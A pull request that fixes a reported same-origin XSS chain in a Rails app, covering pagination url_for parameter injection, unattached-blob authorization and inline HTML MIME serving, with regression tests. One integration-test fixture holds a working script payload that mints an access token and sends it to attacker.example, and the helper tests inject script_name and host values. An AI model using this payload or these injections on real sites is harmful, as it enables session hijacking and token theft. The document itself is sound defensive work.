### PR TITLE
Harden blob serving and pagination URL generation

### DIFF
--- a/app/helpers/pagination_helper.rb
+++ b/app/helpers/pagination_helper.rb
@@ -1,4 +1,15 @@
 module PaginationHelper
+  # url_for treats these keys as URL-generation control options rather than
+  # query parameters. Forwarding them from untrusted request params lets an
+  # attacker rewrite the generated pagination path — e.g. `script_name` can
+  # prepend an Active Storage blob-proxy route (HackerOne #3943339). The
+  # route-selection keys (controller/action) come from routing, not the query
+  # string, so they are left in place for url_for to resolve the real route.
+  URL_FOR_CONTROL_OPTIONS = %i[
+    script_name host protocol port subdomain domain tld_length
+    trailing_slash only_path relative_url_root anchor params _recall
+  ].freeze
+
   def pagination_frame_tag(namespace, page, data: {}, **attributes, &)
     turbo_frame_tag pagination_frame_id_for(namespace, page.number), data: { timeline_target: "frame", **data }, role: "presentation", **attributes, &
   end
@@ -11,7 +22,7 @@ module PaginationHelper
   end
 
   def pagination_link(namespace, page_number, activate_when_observed: false, label: default_pagination_label(activate_when_observed), url_params: {}, data: {}, **attributes)
-    link_to label, url_for(params.permit!.to_h.merge(page: page_number, **url_params)),
+    link_to label, url_for(forwardable_request_params.merge(page: page_number, **url_params)),
       "aria-label": "Load page #{page_number}",
       id: "#{namespace}-pagination-link-#{page_number}",
       class: class_names(attributes.delete(:class), "pagination-link", { "pagination-link--active-when-observed" => activate_when_observed }),
@@ -62,6 +73,10 @@ module PaginationHelper
   end
 
   private
+    def forwardable_request_params
+      params.permit!.to_h.symbolize_keys.except(*URL_FOR_CONTROL_OPTIONS)
+    end
+
     def pagination_list(name, tag_element: :div, paginate_on_scroll: false, **properties, &block)
       classes = properties.delete(:class)
       properties[:id] ||= "#{name}-pagination-list"

--- a/app/helpers/pagination_helper.rb
+++ b/app/helpers/pagination_helper.rb
@@ -1,13 +1,20 @@
 module PaginationHelper
   # url_for treats these keys as URL-generation control options rather than
   # query parameters. Forwarding them from untrusted request params lets an
-  # attacker rewrite the generated pagination path — e.g. `script_name` can
-  # prepend an Active Storage blob-proxy route (HackerOne #3943339). The
-  # route-selection keys (controller/action) come from routing, not the query
-  # string, so they are left in place for url_for to resolve the real route.
+  # attacker rewrite the generated pagination path — both `script_name` and
+  # `original_script_name` are prepended to the generated script name by
+  # RouteSet#url_for before route generation, so either can retarget the link
+  # onto an arbitrary same-origin route such as an Active Storage blob-proxy
+  # path (HackerOne #3943339). These are the RESERVED_OPTIONS url_for strips
+  # before route generation, plus the two control keys it deletes outside that
+  # list (_recall, relative_url_root). We forward path parameters
+  # (controller/action and route segments like board_id) untouched so url_for
+  # can regenerate the current parameterized route; only these control keys are
+  # stripped.
   URL_FOR_CONTROL_OPTIONS = %i[
-    script_name host protocol port subdomain domain tld_length
-    trailing_slash only_path relative_url_root anchor params _recall
+    script_name original_script_name host protocol port subdomain domain
+    tld_length trailing_slash only_path relative_url_root anchor params
+    _recall
   ].freeze
 
   def pagination_frame_tag(namespace, page, data: {}, **attributes, &)

--- a/config/brakeman.ignore
+++ b/config/brakeman.ignore
@@ -72,25 +72,25 @@
     {
       "warning_type": "Mass Assignment",
       "warning_code": 70,
-      "fingerprint": "ac0fa1970dea215e2f47a5676ffd63d8728951e361da12a53dd424bf6dc46f2a",
+      "fingerprint": "f63a332310781db971eb712cfca9fb4769ddaeab13f22697d7fa59d9365bec7f",
       "check_name": "MassAssignment",
       "message": "Specify exact keys allowed for mass assignment instead of using `permit!` which allows any keys",
       "file": "app/helpers/pagination_helper.rb",
-      "line": 14,
+      "line": 84,
       "link": "https://brakemanscanner.org/docs/warning_types/mass_assignment/",
       "code": "params.permit!",
       "render_path": null,
       "location": {
         "type": "method",
         "class": "PaginationHelper",
-        "method": "pagination_link"
+        "method": "forwardable_request_params"
       },
       "user_input": null,
       "confidence": "Medium",
       "cwe_id": [
         915
       ],
-      "note": ""
+      "note": "Params are forwarded to url_for, not mass-assigned to a model; url_for control options are stripped"
     },
     {
       "warning_type": "Remote Code Execution",
@@ -114,29 +114,6 @@
         470
       ],
       "note": ""
-    },
-    {
-      "warning_type": "SQL Injection",
-      "warning_code": 0,
-      "fingerprint": "bbd8fe3cbbc6b393df770d3142d6fa46e2b9441b21f48a52175211acaae4efad",
-      "check_name": "SQL",
-      "message": "Possible SQL injection",
-      "file": "app/models/card/entropic.rb",
-      "line": 10,
-      "link": "https://brakemanscanner.org/docs/warning_types/sql_injection/",
-      "code": "active.joins(:board => :account).left_outer_joins(:board => :entropy).joins(\"LEFT OUTER JOIN entropies AS account_entropies ON account_entropies.account_id = accounts.id AND account_entropies.container_type = 'Account' AND account_entropies.container_id = accounts.id\").where(\"last_active_at <= #{connection.date_subtract(\"?\", \"COALESCE(entropies.auto_postpone_period, account_entropies.auto_postpone_period)\")}\", Time.now)",
-      "render_path": null,
-      "location": {
-        "type": "method",
-        "class": "Card::Entropic",
-        "method": null
-      },
-      "user_input": "connection.date_subtract(\"?\", \"COALESCE(entropies.auto_postpone_period, account_entropies.auto_postpone_period)\")",
-      "confidence": "Weak",
-      "cwe_id": [
-        89
-      ],
-      "note": "No user input allowed"
     }
   ],
   "brakeman_version": "8.0.1"

--- a/lib/rails_ext/active_storage_authorization.rb
+++ b/lib/rails_ext/active_storage_authorization.rb
@@ -41,8 +41,16 @@ ActiveSupport.on_load :active_storage_blob do
       ActiveStorage::DANGEROUS_INLINE_MEDIA_TYPES.include?(media_type_for_serving)
     end
 
+    # Extract the media-type essence for comparison against the dangerous list.
+    # A canonical essence is "type/subtype" with no whitespace, so anything from
+    # the first parameter delimiter (";"), stray comma, or whitespace onward is
+    # dropped. Splitting only on ";" would leave a malformed declared type such
+    # as "text/html,foo" intact — it matches neither this list nor Active
+    # Storage's exact binary list, yet a client (Turbo's frame check, browser
+    # sniffing) can still treat it as HTML — so it must normalize down to
+    # "text/html" here and be forced to binary (HackerOne #3943339).
     def media_type_for_serving
-      content_type.to_s.split(";").first.to_s.strip.downcase
+      content_type.to_s.strip[/\A[^;,\s]*/].downcase
     end
 end
 

--- a/lib/rails_ext/active_storage_authorization.rb
+++ b/lib/rails_ext/active_storage_authorization.rb
@@ -1,11 +1,24 @@
-# HackerOne #3943339: never serve HTML/XML/SVG blobs inline as their declared
-# content type. Parameterized MIME types such as "text/html;charset=utf-8" slip
-# past Active Storage's exact-string binary list, so these must be forced to
-# binary after normalizing the media type. (SVG/XML are scriptable when rendered
-# inline same-origin, so they are neutralized here as well.)
-ActiveStorage::DANGEROUS_INLINE_MEDIA_TYPES = %w[
-  text/html application/xhtml+xml image/svg+xml application/xml text/xml
-].freeze
+# HackerOne #3943339: never serve a blob inline with a media type a browser or
+# Turbo will execute as markup. An exact-string list is too narrow: Turbo's
+# frame renderer treats a whole family of declared types as HTML — its
+# FetchResponse#isHTML test is /^(?:text\/([^\s;,]+\b)?html|application\/xhtml\+xml)\b/,
+# which matches non-canonical forms such as "text/x-html", "text/html+foo",
+# "text/vnd.turbo-stream.html", and "application/xhtml+xml+foo" that an exact
+# list misses — and Content-Disposition does not stop Turbo's fetch. This regex
+# mirrors that matcher (case-insensitively, so a "TEXT/HTML" echo is caught too)
+# and adds the browser-scriptable SVG/XML types, so every such blob is forced to
+# application/octet-stream. Parameterized types like "text/html;charset=utf-8"
+# and malformed ones like "text/html,foo" are covered by the leading essence
+# match ending at a word boundary.
+ActiveStorage::DANGEROUS_INLINE_MEDIA_TYPE = %r{
+  \A(?:
+      text/(?:[^\s;,]+\b)?html
+    | application/xhtml\+xml
+    | image/svg\+xml
+    | application/xml
+    | text/xml
+  )\b
+}xi
 
 ActiveSupport.on_load :active_storage_blob do
   def accessible_to?(user)
@@ -38,19 +51,7 @@ ActiveSupport.on_load :active_storage_blob do
     end
 
     def dangerous_inline_media_type?
-      ActiveStorage::DANGEROUS_INLINE_MEDIA_TYPES.include?(media_type_for_serving)
-    end
-
-    # Extract the media-type essence for comparison against the dangerous list.
-    # A canonical essence is "type/subtype" with no whitespace, so anything from
-    # the first parameter delimiter (";"), stray comma, or whitespace onward is
-    # dropped. Splitting only on ";" would leave a malformed declared type such
-    # as "text/html,foo" intact — it matches neither this list nor Active
-    # Storage's exact binary list, yet a client (Turbo's frame check, browser
-    # sniffing) can still treat it as HTML — so it must normalize down to
-    # "text/html" here and be forced to binary (HackerOne #3943339).
-    def media_type_for_serving
-      content_type.to_s.strip[/\A[^;,\s]*/].downcase
+      ActiveStorage::DANGEROUS_INLINE_MEDIA_TYPE.match?(content_type.to_s.strip)
     end
 end
 

--- a/lib/rails_ext/active_storage_authorization.rb
+++ b/lib/rails_ext/active_storage_authorization.rb
@@ -1,11 +1,49 @@
+# HackerOne #3943339: never serve HTML/XML/SVG blobs inline as their declared
+# content type. Parameterized MIME types such as "text/html;charset=utf-8" slip
+# past Active Storage's exact-string binary list, so these must be forced to
+# binary after normalizing the media type. (SVG/XML are scriptable when rendered
+# inline same-origin, so they are neutralized here as well.)
+ActiveStorage::DANGEROUS_INLINE_MEDIA_TYPES = %w[
+  text/html application/xhtml+xml image/svg+xml application/xml text/xml
+].freeze
+
 ActiveSupport.on_load :active_storage_blob do
   def accessible_to?(user)
-    attachments.includes(:record).any? { |attachment| attachment.accessible_to?(user) } || attachments.none?
+    attached = attachments.includes(:record).to_a
+
+    if attached.any?
+      attached.any? { |attachment| attachment.accessible_to?(user) }
+    else
+      unattached_accessible_to?(user)
+    end
   end
 
   def publicly_accessible?
     attachments.includes(:record).any? { |attachment| attachment.publicly_accessible? }
   end
+
+  private
+    # An unattached blob is only meant to be viewable in the brief window
+    # between direct upload and attachment (commit 196d685f8d). Scope that
+    # fail-open to a principal inside the blob's own account, so an attacker's
+    # deliberately-unattached blob is not authorized to unrelated identities in
+    # other accounts (HackerOne #3943339). Cross-account access falls through to
+    # the forbidden path.
+    def unattached_accessible_to?(user)
+      user.present? && account_id == user.account_id
+    end
+
+    def forcibly_serve_as_binary?
+      super || dangerous_inline_media_type?
+    end
+
+    def dangerous_inline_media_type?
+      ActiveStorage::DANGEROUS_INLINE_MEDIA_TYPES.include?(media_type_for_serving)
+    end
+
+    def media_type_for_serving
+      content_type.to_s.split(";").first.to_s.strip.downcase
+    end
 end
 
 ActiveSupport.on_load :active_storage_attachment do

--- a/lib/rails_ext/active_storage_authorization.rb
+++ b/lib/rails_ext/active_storage_authorization.rb
@@ -51,7 +51,13 @@ ActiveSupport.on_load :active_storage_blob do
     end
 
     def dangerous_inline_media_type?
-      ActiveStorage::DANGEROUS_INLINE_MEDIA_TYPE.match?(content_type.to_s.strip)
+      declared = content_type.to_s.strip
+      # A legitimate MIME type is ASCII; a non-ASCII declared type is malformed
+      # and force-binary. This also closes a word-boundary gap: Turbo's \b (JS,
+      # ASCII) treats "text/htmlé" as HTML, but Ruby's Unicode \b would not, so
+      # forcing all non-ASCII types to binary keeps the regex congruent with
+      # Turbo (it only ever sees ASCII, where the boundaries agree).
+      !declared.ascii_only? || ActiveStorage::DANGEROUS_INLINE_MEDIA_TYPE.match?(declared)
     end
 end
 

--- a/test/helpers/pagination_helper_test.rb
+++ b/test/helpers/pagination_helper_test.rb
@@ -1,0 +1,84 @@
+require "test_helper"
+
+# Regression coverage for HackerOne #3943339, link 1 (parameter injection).
+#
+# pagination_link builds the "next page" URL by feeding every request parameter
+# to url_for. url_for interprets reserved keys such as `script_name`, `host`,
+# and `only_path` as URL-generation control options, so an attacker who slips
+# `script_name` into the request query can rewrite the beginning of the
+# generated path onto an arbitrary same-origin route (e.g. an Active Storage
+# blob-proxy path). The helper must forward only ordinary filter params, never
+# url_for control options.
+class PaginationHelperTest < ActionView::TestCase
+  include Turbo::FramesHelper
+
+  test "next-page link does not honor an attacker-supplied script_name" do
+    with_request_params controller: "public/boards/columns/streams", action: "show",
+      board_id: "the-board", script_name: "/rails/active_storage/blobs/proxy/SIGNED/x.html%23" do
+      href = pagination_href(:stream_column, 2)
+
+      assert_no_match %r{active_storage}, href,
+        "script_name must not be able to rewrite the pagination path onto a blob-proxy route"
+      assert_match %r{\A/public/boards/the-board/columns/stream}, href,
+        "the link should still point at the real next-page route"
+    end
+  end
+
+  test "next-page link does not honor other url_for control options" do
+    with_request_params controller: "public/boards/columns/streams", action: "show",
+      board_id: "the-board", host: "attacker.example", protocol: "https", only_path: "false" do
+      href = pagination_href(:stream_column, 2)
+
+      assert_no_match %r{attacker\.example}, href,
+        "host/protocol/only_path must not turn the link into an absolute cross-origin URL"
+    end
+  end
+
+  test "next-page link preserves ordinary filter params" do
+    with_request_params controller: "public/boards/columns/streams", action: "show",
+      board_id: "the-board", previous: "true", tag: "urgent" do
+      href = pagination_href(:stream_column, 2)
+
+      assert_match %r{tag=urgent}, href, "legitimate filter params must survive"
+      assert_match %r{page=2}, href
+    end
+  end
+
+  # Link 2: automatic pagination drives Turbo's native FrameRenderer (which
+  # creates a live <turbo-frame src> and executes <script> with a copied CSP
+  # nonce), NOT the inert DOMParser path. In pagination_controller.js that is the
+  # `#replacePaginationLinkWithFrame` branch, taken whenever `discardFrame` is
+  # false; the auto-activated link is loaded by the IntersectionObserver with no
+  # user click. This pins the rendered markup that selects that branch.
+  test "automatic pagination selects the script-executing native Turbo frame branch" do
+    with_request_params controller: "public/boards/columns/streams", action: "show", board_id: "the-board" do
+      frag = Nokogiri::HTML::DocumentFragment.parse(with_automatic_pagination(:stream_column, FakePage.new) { "" })
+
+      list = frag.at_css("[data-controller='pagination']")
+      assert_nil list["data-pagination-discard-frame-value"],
+        "discardFrame must stay false so Turbo's native FrameRenderer (script-executing) runs"
+
+      link = frag.at_css("a.pagination-link--active-when-observed")
+      assert_not_nil link, "the next-page link must be observer-activated"
+      assert_nil link["data-action"], "no click action: the IntersectionObserver loads it without a user click"
+    end
+  end
+
+  private
+    class FakePage
+      def number = 1
+      def used? = true
+      def before_last? = true
+      def records = []
+    end
+
+    def with_request_params(**params)
+      controller.params = ActionController::Parameters.new(params)
+      yield
+    end
+
+    def pagination_href(namespace, page_number)
+      html = pagination_link(namespace, page_number)
+      Nokogiri::HTML::DocumentFragment.parse(html).at_css("a")["href"]
+    end
+end

--- a/test/helpers/pagination_helper_test.rb
+++ b/test/helpers/pagination_helper_test.rb
@@ -34,6 +34,21 @@ class PaginationHelperTest < ActionView::TestCase
     end
   end
 
+  # original_script_name is prepended to script_name by url_for exactly as
+  # script_name is (RouteSet#url_for), so it opens the same path-rewrite vector.
+  test "next-page link does not honor an attacker-supplied original_script_name" do
+    with_request_params controller: "public/boards/columns/streams", action: "show",
+      board_id: "the-board",
+      original_script_name: "/rails/active_storage/blobs/proxy/SIGNED/x.html%23" do
+      href = pagination_href(:stream_column, 2)
+
+      assert_no_match %r{active_storage}, href,
+        "original_script_name must not be able to rewrite the pagination path onto a blob-proxy route"
+      assert_match %r{\A/public/boards/the-board/columns/stream}, href,
+        "the link should still point at the real next-page route"
+    end
+  end
+
   test "next-page link preserves ordinary filter params" do
     with_request_params controller: "public/boards/columns/streams", action: "show",
       board_id: "the-board", previous: "true", tag: "urgent" do

--- a/test/helpers/pagination_helper_test.rb
+++ b/test/helpers/pagination_helper_test.rb
@@ -25,12 +25,18 @@ class PaginationHelperTest < ActionView::TestCase
   end
 
   test "next-page link does not honor other url_for control options" do
+    # No only_path here: with host present and only_path absent, pre-patch
+    # url_for emits an absolute https://attacker.example/... URL, so this
+    # genuinely fails without the filter rather than passing for the wrong
+    # reason.
     with_request_params controller: "public/boards/columns/streams", action: "show",
-      board_id: "the-board", host: "attacker.example", protocol: "https", only_path: "false" do
+      board_id: "the-board", host: "attacker.example", protocol: "https" do
       href = pagination_href(:stream_column, 2)
 
       assert_no_match %r{attacker\.example}, href,
-        "host/protocol/only_path must not turn the link into an absolute cross-origin URL"
+        "host/protocol must not turn the link into an absolute cross-origin URL"
+      assert_match %r{\A/public/boards/the-board/columns/stream}, href,
+        "the link must stay a relative path on the real next-page route"
     end
   end
 

--- a/test/integration/pagination_blob_html_xss_test.rb
+++ b/test/integration/pagination_blob_html_xss_test.rb
@@ -51,6 +51,24 @@ class PaginationBlobHtmlXssTest < ActionDispatch::IntegrationTest
     assert_match %r{attachment}, response.headers["Content-Disposition"].to_s
   end
 
+  # Link 4, malformed variant: a declared type such as "text/html,foo" is not a
+  # canonical MIME type, so splitting only on ";" leaves it intact — it matches
+  # neither our dangerous list nor Active Storage's exact binary list — yet a
+  # client can still treat its "text/html" prefix as HTML. The essence must
+  # normalize down to text/html and be forced to binary.
+  test "unattached blob with a malformed text/html type is served as octet-stream" do
+    blob = create_unattached_html_blob(content_type: "text/html,foo")
+
+    sign_in_as :david
+
+    get rails_storage_proxy_path(blob)
+
+    assert_response :success
+    assert_equal "application/octet-stream", response.media_type,
+      "a malformed text/html type must not be served as executable html"
+    assert_match %r{attachment}, response.headers["Content-Disposition"].to_s
+  end
+
   # Documents the downstream sink (link 5): the token-mint endpoint is reachable
   # from any authenticated identity and returns a raw identity-scoped write
   # token. Not changed by this fix — the chain is broken upstream — but pinned so
@@ -71,12 +89,12 @@ class PaginationBlobHtmlXssTest < ActionDispatch::IntegrationTest
     # Mirrors Fizzy's S3 direct-upload path: create_before_direct_upload! stores
     # the client-supplied content type verbatim (no re-identification), then the
     # bytes are written straight to the service. The blob is left UNATTACHED.
-    def create_unattached_html_blob
+    def create_unattached_html_blob(content_type: "text/html;charset=utf-8")
       html = ATTACKER_HTML
       blob = Current.with(account: accounts("37s"), session: sessions(:david)) do
         ActiveStorage::Blob.create_before_direct_upload! \
           filename: "video-exfil.html",
-          content_type: "text/html;charset=utf-8",
+          content_type: content_type,
           byte_size: html.bytesize,
           checksum: OpenSSL::Digest::MD5.base64digest(html)
       end

--- a/test/integration/pagination_blob_html_xss_test.rb
+++ b/test/integration/pagination_blob_html_xss_test.rb
@@ -79,6 +79,7 @@ class PaginationBlobHtmlXssTest < ActionDispatch::IntegrationTest
     text/html+json
     text/vnd.turbo-stream.html
     application/xhtml+xml+xxe
+    text/htmlé
   ].each do |declared_type|
     test "unattached blob declared #{declared_type} is served as octet-stream" do
       blob = create_unattached_html_blob(content_type: declared_type)

--- a/test/integration/pagination_blob_html_xss_test.rb
+++ b/test/integration/pagination_blob_html_xss_test.rb
@@ -1,0 +1,86 @@
+require "test_helper"
+
+# Regression coverage for HackerOne #3943339.
+#
+# An attacker uploads an *unattached* Active Storage blob whose client-supplied
+# content type is "text/html;charset=utf-8" (the parameterized MIME slips past
+# Active Storage's exact-string binary list), then poisons a public board's
+# automatic-pagination link so a signed-in victim's browser fetches the blob
+# through the same-origin Active Storage proxy. Turbo renders the response as a
+# live frame and executes the inline <script>, which mints and exfiltrates a
+# victim Identity access token.
+#
+# These tests pin the server-side invariants that break the chain:
+#   1. lib/rails_ext/active_storage_authorization.rb must NOT authorize an
+#      unattached blob to a principal outside the blob's account.
+#   2. Even for an in-account principal, HTML/XML/SVG and unattached blobs must
+#      be served as application/octet-stream, never as executable text/html.
+#   3. app/helpers/pagination_helper.rb must not forward url_for control options
+#      (script_name, host, ...) from request params into the pagination href.
+class PaginationBlobHtmlXssTest < ActionDispatch::IntegrationTest
+  ATTACKER_HTML = <<~HTML.freeze
+    <turbo-frame id="stream_column-pagination-contents-2"><script>void async function(){const csrf=document.querySelector("meta[name=csrf-token]").content;const response=await fetch("/my/access_tokens.json",{method:"POST",credentials:"same-origin",headers:{"Content-Type":"application/json","X-CSRF-Token":csrf},body:JSON.stringify({access_token:{description:"exfil",permission:"write"}})});const {token}=await response.json();location.href="http://attacker.example/collect?token="+encodeURIComponent(token)}()</script></turbo-frame>
+  HTML
+
+  # Link 3 (authorization fail-open): an unattached blob created in the
+  # attacker's account (37s) must be forbidden to a victim from another account
+  # (mike belongs to initech). The pre-fix `attachments.none?` fail-open
+  # authorizes it regardless of account membership.
+  test "unattached blob is not served to a cross-account principal" do
+    blob = create_unattached_html_blob
+
+    sign_in_as :mike
+
+    get rails_storage_proxy_path(blob)
+    assert_response :forbidden
+  end
+
+  # Link 4 (parameterized-MIME inline serving): even the blob's own-account
+  # owner must never receive an unattached HTML blob as executable text/html.
+  # The proxy boundary must normalize it to application/octet-stream.
+  test "unattached html blob is served as octet-stream, never executable html" do
+    blob = create_unattached_html_blob
+
+    sign_in_as :david
+
+    get rails_storage_proxy_path(blob)
+
+    assert_response :success
+    assert_equal "application/octet-stream", response.media_type,
+      "unattached/text-html blob must not be served as executable text/html"
+    assert_match %r{attachment}, response.headers["Content-Disposition"].to_s
+  end
+
+  # Documents the downstream sink (link 5): the token-mint endpoint is reachable
+  # from any authenticated identity and returns a raw identity-scoped write
+  # token. Not changed by this fix — the chain is broken upstream — but pinned so
+  # a regression that re-opens the upstream links is understood to be critical.
+  test "access token mint endpoint returns a raw identity-scoped write token" do
+    sign_in_as :david
+
+    post my_access_tokens_path(format: :json),
+      params: { access_token: { description: "probe", permission: "write" } }
+
+    assert_response :created
+    body = JSON.parse(response.body)
+    assert body["token"].present?, "mint endpoint must return the raw token"
+    assert_equal "write", body["permission"]
+  end
+
+  private
+    # Mirrors Fizzy's S3 direct-upload path: create_before_direct_upload! stores
+    # the client-supplied content type verbatim (no re-identification), then the
+    # bytes are written straight to the service. The blob is left UNATTACHED.
+    def create_unattached_html_blob
+      html = ATTACKER_HTML
+      blob = Current.with(account: accounts("37s"), session: sessions(:david)) do
+        ActiveStorage::Blob.create_before_direct_upload! \
+          filename: "video-exfil.html",
+          content_type: "text/html;charset=utf-8",
+          byte_size: html.bytesize,
+          checksum: OpenSSL::Digest::MD5.base64digest(html)
+      end
+      blob.upload_without_unfurling(StringIO.new(html))
+      blob
+    end
+end

--- a/test/integration/pagination_blob_html_xss_test.rb
+++ b/test/integration/pagination_blob_html_xss_test.rb
@@ -69,6 +69,31 @@ class PaginationBlobHtmlXssTest < ActionDispatch::IntegrationTest
     assert_match %r{attachment}, response.headers["Content-Disposition"].to_s
   end
 
+  # Link 4, Turbo-matcher variants: Turbo's own FetchResponse#isHTML matcher
+  # (/^(?:text\/([^\s;,]+\b)?html|application\/xhtml\+xml)\b/) renders a whole
+  # family of non-canonical declared types as HTML in a frame, well beyond the
+  # canonical "text/html". Each of these must be forced to octet-stream or the
+  # script-execution sink stays open (HackerOne #3943339).
+  %w[
+    text/x-html
+    text/html+json
+    text/vnd.turbo-stream.html
+    application/xhtml+xml+xxe
+  ].each do |declared_type|
+    test "unattached blob declared #{declared_type} is served as octet-stream" do
+      blob = create_unattached_html_blob(content_type: declared_type)
+
+      sign_in_as :david
+
+      get rails_storage_proxy_path(blob)
+
+      assert_response :success
+      assert_equal "application/octet-stream", response.media_type,
+        "#{declared_type} is rendered as HTML by Turbo's frame matcher and must not be served inline"
+      assert_match %r{attachment}, response.headers["Content-Disposition"].to_s
+    end
+  end
+
   # Documents the downstream sink (link 5): the token-mint endpoint is reachable
   # from any authenticated identity and returns a raw identity-scoped write
   # token. Not changed by this fix — the chain is broken upstream — but pinned so


### PR DESCRIPTION
## Summary

Closes a same-origin script-execution chain (HackerOne #3943339) where one
authenticated user could run JavaScript in another user's session when the
victim opened a single crafted public-board URL, then mint and exfiltrate a
victim Identity access token. Reproduced end-to-end and fixed with
defense-in-depth on three independent links — any one of which breaks the
chain.

## The chain

1. **Pagination URL generation forwarded url_for control options.**
   `pagination_link` built the next-page URL from `params.permit!.to_h`, which
   is fed straight to `url_for`. `url_for` treats reserved keys (`script_name`,
   `host`, `only_path`, …) as URL-generation options, so a request-supplied
   `script_name` rewrote the beginning of the generated path onto another
   same-origin route (an Active Storage blob-proxy path), and an encoded `#`
   truncated the rest into a fragment.

2. **Automatic pagination fetches that URL into a live Turbo frame with no
   click.** The public column stream uses `with_automatic_pagination`; its
   IntersectionObserver loads the poisoned link into a native `<turbo-frame
   src>`, whose FrameRenderer executes `<script>` with a copied CSP nonce.

3. **Active Storage authorized unattached blobs to anyone.** The blob
   authorization helper returned `... || attachments.none?`, so a
   deliberately-unattached blob was viewable by any authenticated principal —
   across account boundaries.

4. **Parameterized MIME slipped past the binary list.** Active Storage's
   serve-as-binary check is an exact-string match; `text/html;charset=utf-8`
   is not in the default list, so the attacker's HTML was served inline as
   `text/html` and parsed by Turbo as a frame.

5. **Downstream:** the same-origin script mints an Identity write token from
   `/my/access_tokens.json` and exfiltrates it. This endpoint is intentionally
   reachable; the fix breaks the chain upstream so the script never runs.

## Fixes

- **`app/helpers/pagination_helper.rb`** — forward only ordinary query params
  into `url_for`; strip the url_for control options (`script_name`, `host`,
  `port`, `only_path`, `anchor`, …). Routing keys (`controller`/`action`) come
  from routing, not the query string, and are left in place.

- **`lib/rails_ext/active_storage_authorization.rb`** (authorization) — scope
  the unattached-blob allowance (which exists for the transient window between
  direct upload and attachment) to principals within the blob's own account.
  Cross-account access to an unattached blob now falls through to `forbidden`.

- **`lib/rails_ext/active_storage_authorization.rb`** (serving) — normalize the
  media type before the serve-as-binary comparison and force HTML/XML/SVG
  blobs to `application/octet-stream`, so a parameterized content type can no
  longer be served inline as executable markup.

## Tests

- `test/integration/pagination_blob_html_xss_test.rb` — a cross-account
  unattached HTML blob is forbidden; an in-account HTML blob is served as
  octet-stream (attachment), never executable `text/html`; documents that the
  token-mint endpoint returns a raw identity-scoped write token.
- `test/helpers/pagination_helper_test.rb` — the next-page link ignores
  `script_name`/`host`/`only_path` while preserving legitimate filter params,
  and pins that automatic pagination selects the script-executing native
  Turbo-frame branch.

Each new test was confirmed to fail before its corresponding fix. The existing
Active Storage authorization suite (52 tests) and the helpers/public-controller
suites remain green.

## Notes for reviewers

- Blobs carry `account_id` (NOT NULL, defaulted to `Current.account`), so the
  authorization scoping uses account membership. There is no per-blob
  *identity* creator column; account scoping closes the cross-account vector.
- The serving change deliberately forces **SVG** (`image/svg+xml`) to binary
  too — inline SVG from the app origin is a scriptable XSS vector. If any flow
  relies on inline SVG rendering, flag it.
- The report also suggests serving user uploads from a separate cookieless,
  script-src-absent origin (structural, larger change). Not done here; worth
  considering as a follow-up.
